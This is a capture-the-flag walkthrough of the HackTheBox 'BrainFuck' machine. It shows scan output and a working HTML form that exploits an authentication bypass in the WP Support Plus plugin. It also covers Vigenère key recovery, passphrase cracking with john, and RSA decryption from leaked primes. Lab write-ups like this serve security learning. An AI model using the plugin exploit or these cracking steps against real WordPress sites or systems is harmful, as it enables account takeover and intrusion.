###### tags: `hackthebox` `tutorials` `BrainFuck` `CTF` `hacking` `insane`

# BrainFuck

BrainFuck was a nice, quick box on the HackTheBox site. It is rated Insane, but it felt more like a Medium. The box serves two virtual hosts on one IP, each with a different site: one runs WordPress, the other is a text forum built on Flarum. We have to compromise both to get SSH access. The box also runs a mail server (SMTP plus POP3) that is not meant to be exploited, only used to read mail.

So let's get started!

## Nmap

We start with an Nmap scan to see which ports are open on the box.

```
# Nmap 7.80 scan initiated Thu Mar 26 22:25:36 2020 as: nmap -sC -sV -oN Nmap/brainfuck 10.10.10.17
Nmap scan report for 10.10.10.17
Host is up (0.41s latency).
Not shown: 995 filtered ports
PORT    STATE SERVICE    VERSION
22/tcp  open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
|   256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_  256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp  open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
110/tcp open  pop3       Dovecot pop3d
143/tcp open  tcpwrapped
443/tcp open  https      nginx/1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after:  2027-04-11T11:19:29
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
| tls-nextprotoneg:
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 26 22:27:18 2020 -- 1 IP address (1 host up) scanned in 101.55 seconds
```

The scan reveals some interesting ports: 25 and 110, which are SMTP *(Simple Mail Transfer Protocol)* and POP3 *(Post Office Protocol)* respectively, with Dovecot serving POP3. Since port 443 (HTTPS) is also open, let's start there, as a web application offers the widest attack surface.

## WebPage Enumeration

By default the web page shows the nginx welcome page, so let's start by examining the SSL certificate for information such as usernames, email addresses and domain names. The certificate gives us an email address and two DNS names in the Subject Alternative Name extension:

```
E = orestis@brainfuck.htb
CN = brainfuck.htb
OU = IT
O = Brainfuck Ltd.
L = Athens
ST = Attica
C = GR
======================================
DNS Name: www.brainfuck.htb
DNS Name: sup3rs3cr3t.brainfuck.htb
```

nginx picks the site to serve from the Host header (and the TLS SNI name), which is why the bare IP only returned the default page. So let's add entries to /etc/hosts mapping 10.10.10.17 to brainfuck.htb, www.brainfuck.htb and sup3rs3cr3t.brainfuck.htb, and examine the web pages again.

Now we find two different content management systems on the two names. www.brainfuck.htb runs WordPress, so we use wpscan to examine it; sup3rs3cr3t.brainfuck.htb is a text forum which, after some googling, turned out to run Flarum. The forum requires login credentials for any further enumeration, so we ignore it for now. The wpscan output gives us plenty of details.
```
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.9
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

URL: https://brainfuck.htb/ [10.10.10.17]
Started: Fri Mar 27 18:07:57 2020

Interesting Finding(s):

Headers
 | Interesting Entry: Server: nginx/1.10.0 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

XML-RPC seems to be enabled: https://brainfuck.htb/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

https://brainfuck.htb/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

https://brainfuck.htb/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
 | Found By: Rss Generator (Passive Detection)
 |  - https://brainfuck.htb/?feed=rss2, <generator>https://wordpress.org/?v=4.7.3</generator>
 |  - https://brainfuck.htb/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.7.3</generator>

WordPress theme in use: proficient
 | Location: https://brainfuck.htb/wp-content/themes/proficient/
 | Last Updated: 2020-03-02T00:00:00.000Z
 | Readme: https://brainfuck.htb/wp-content/themes/proficient/readme.txt
 | The version is out of date, the latest version is 3.0.15
 | Style URL: https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3
 | Style Name: Proficient
 | Description: Proficient is a Multipurpose WordPress theme with lots of powerful features, instantly giving a prof...
 | Author: Specia
 | Author URI: https://speciatheme.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.0.6 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3, Match: 'Version: 1.0.6'

Enumerating All Plugins (via Passive Methods)
Checking Plugin Versions (via Passive and Aggressive Methods)

Plugin(s) Identified:

wp-support-plus-responsive-ticket-system
 | Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
 | Last Updated: 2019-09-03T07:57:00.000Z
 | The version is out of date, the latest version is 9.1.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 7.1.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt

Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups -:
 |========================================================================================================================================|

No Config Backups Found.

No WPVulnDB API Token given, as a result, vulnerability data has not been output.
You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

Finished: Fri Mar 27 18:08:13 2020
Requests Done: 53
Cached Requests: 5
Data Sent: 11.692 KB
Data Received: 161.223 KB
Memory used: 182.68 MB
Elapsed time: 00:00:15
```

The important finding is the plugin **wp-support-plus-responsive-ticket-system** at version 7.1.3. Because no WPVulnDB API token was given, wpscan prints no vulnerability data, so the version has to be cross-checked by hand: searching for the plugin name and version leads to https://www.exploit-db.com/exploits/41006, a privilege escalation. The plugin's `loginGuestFacebook` AJAX action sets a WordPress authentication cookie for whatever username is posted to it, without ever checking a password, so it lets us log in as any existing user. Adapting the proof-of-concept form from the exploit to our target gives the following (the site is only served over HTTPS, so the action URL uses https):

```
<form method="post" action="https://www.brainfuck.htb/wp-admin/admin-ajax.php">
 Username: <input type="text" name="username" value="administrator">
 <input type="hidden" name="email" value="sth">
 <input type="hidden" name="action" value="loginGuestFacebook">
 <input type="submit" value="Login">
</form>
```

Save it as an HTML file, open it in Firefox and submit the form; the response sets the login cookie, and browsing to /wp-admin now shows the dashboard. Enumerating the dashboard we find the SMTP settings, where the password is stored in a masked password field. Its value can be read with the browser's developer tools by inspecting the input element. We get the credentials:

```
username: orestis@brainfuck.htb
password: kHGuERB29DNiNE
```

## SMTP Enumeration

Now that we have mail credentials, let's open Thunderbird and add the account. Setup is simple: username **orestis**, email address **orestis@brainfuck.htb** and the password above; incoming mail is fetched over POP3, the Dovecot service Nmap showed on port 110. Once in, we find an email that talks about the credentials for the text forum we found earlier:

```
username: orestis
password: kIEnnfEKJ#9UmdO
```

## The Text Forum

Logging into the forum with these credentials, we find a thread about the SSH key, but the relevant post is encrypted with a Vigenère cipher.
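The key recovery in this section is done by hand and with dcode.fr. The script below is an added example, not part of the original writeup, that shows the same known-plaintext reasoning in code: a crib ("https" in front of "://") is subtracted from the ciphertext to get a key fragment, and the fragment is then tried against candidate key lengths to see how much of the message it reveals. The message and the URL in it are constructed for the demo; only the key FUCKMYBRAIN is from the box.

```python
# Added example (not from the original writeup): Vigenere known-plaintext
# key recovery. The message below is constructed; the key is the box's key.
import string

ALPHA = string.ascii_uppercase


def vigenere(text, key, decrypt=False):
    """Classic Vigenere. Only letters are shifted, and the key index advances
    only on letters (dcode.fr's default), so spaces, punctuation and digits
    pass through unchanged and keep their positions."""
    out, k = [], 0
    for ch in text:
        if ch.isalpha():
            shift = ALPHA.index(key[k % len(key)].upper())
            if decrypt:
                shift = -shift
            new = ALPHA[(ALPHA.index(ch.upper()) + shift) % 26]
            out.append(new if ch.isupper() else new.lower())
            k += 1
        else:
            out.append(ch)
    return "".join(out)


def letter_index(text, pos):
    """Number of letters before position pos, i.e. the key index used at pos."""
    return sum(1 for ch in text[:pos] if ch.isalpha())


def recover_key_fragment(ciphertext, crib, pos):
    """Known-plaintext attack: key letter = cipher letter - plain letter (mod 26)
    for every letter of the crib at offset pos. Returns the fragment and the
    key index at which it starts."""
    frag = []
    for c_ch, p_ch in zip(ciphertext[pos:pos + len(crib)], crib):
        if not c_ch.isalpha():
            continue  # non-letters were never enciphered
        frag.append(ALPHA[(ALPHA.index(c_ch.upper()) - ALPHA.index(p_ch.upper())) % 26])
    return "".join(frag), letter_index(ciphertext, pos)


def partial_decrypt(ciphertext, fragment, start, period):
    """Decrypt with a partially known key of the given period: positions the
    fragment covers decrypt normally, unknown ones become '?'. Reading the
    output for several periods is how the rest of the key gets guessed."""
    if period < len(fragment):
        raise ValueError("period shorter than the known fragment")
    known = {(start + i) % period: ch for i, ch in enumerate(fragment)}
    out, k = [], 0
    for ch in ciphertext:
        if ch.isalpha():
            key_ch = known.get(k % period)
            if key_ch is None:
                out.append("?")
            else:
                new = ALPHA[(ALPHA.index(ch.upper()) - ALPHA.index(key_ch)) % 26]
                out.append(new if ch.isupper() else new.lower())
            k += 1
        else:
            out.append(ch)
    return "".join(out)


# Constructed demo message; the real forum post is not reproduced here.
PLAINTEXT = "the ssh key at https://example.invalid/keys/id_rsa - orestis"
KEY = "FUCKMYBRAIN"
CIPHERTEXT = vigenere(PLAINTEXT, KEY)

if __name__ == "__main__":
    # "://" survives encryption, so the five letters before it must be "https".
    pos = CIPHERTEXT.index("://") - 5
    frag, start = recover_key_fragment(CIPHERTEXT, "https", pos)
    print("ciphertext  :", CIPHERTEXT)
    print("key fragment:", frag, "at key index", start)
    for period in range(len(frag), 16):
        print(f"period {period:2d}: {partial_decrypt(CIPHERTEXT, frag, start, period)}")
    print("with full key:", vigenere(CIPHERTEXT, KEY, decrypt=True))
```

In the constructed message exactly eleven letters precede the URL, so the fragment lands at key index 0 and comes out as FUCKM, matching the writeup; for a real ciphertext the fragment starts at whatever key index the crib happens to fall on, which is why the function returns that index along with the letters.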
Online tools such as dcode.fr cannot decrypt it directly because we do not know the key. But one part of the ciphertext looks like a URL: a block of five letters followed by `://`. The only five-letter scheme that fits is `https`, so we have a known plaintext. Subtracting those plaintext letters from the ciphertext letters gives the key letters used at those positions, a partial key:

```
FUCKM
```

Now dcode.fr can find the rest: enter this fragment in the **Knowing Partial Key** section and paste the encrypted text. The full key turns out to be:

```
FUCKMYBRAIN
```

Knowing the Vigenère key we decrypt the message, get the URL of the SSH key, and download it.

## Getting Shell

The downloaded SSH private key is protected with a passphrase. Converting it to a hash with ssh2john and running john against the RockYou wordlist recovers it:

```
ssh2john id.rsa > hash
john --wordlist=~/rockyou hash
password found: 3poulakia!
```

With that passphrase we SSH in as orestis, and boom! we are in and can read user.txt:

```
cat user.txt
2c11cfbc5b959f73ac15a3310bd097c9
```

## Privilege Escalation

In the home directory of the user **orestis** we find a file named encrypt.sage. On some enumeration, I found that Sage is a mathematical software system built on Python. Fortunately, the script is a textbook RSA encryption of /root/root.txt, and it also writes the private parameters to a debug file, so plain Python is enough to decrypt the output.

```
nbits = 1024

password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))

p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)

e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
    e = ZZ.random_element(phi)

c = pow(m, e, n)

enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')
```

debug.txt contains p, q and e, which is everything needed to undo the encryption: phi = (p-1)*(q-1), the private exponent is d = e^-1 mod phi, and m = c^d mod n is the integer encoding of root.txt. Decrypting the value in output.txt should therefore give us the root.txt hash.
I wrote a Python script to perform this RSA decryption; p, q and e are copied from debug.txt and enc is the "Encrypted Password" value from output.txt.

```
from Crypto.Util.number import inverse, long_to_bytes

# p, q and e from debug.txt on the box
p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
# the ciphertext from output.txt
enc = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182

n = p * q
phi = (p - 1) * (q - 1)
d = inverse(e, phi)        # private exponent: d = e^-1 mod phi(n)
mess = pow(enc, d, n)      # m = c^d mod n

print("password found")
# the plaintext integer is the ASCII bytes of root.txt (the Sage script hex-encoded it)
print(long_to_bytes(mess).decode())
```

This gives us the root.txt hash. I tried to get a root shell, but it was not intended and I didn't find any reliable path. That was the box; I will upload other Linux OSCP-style boxes later.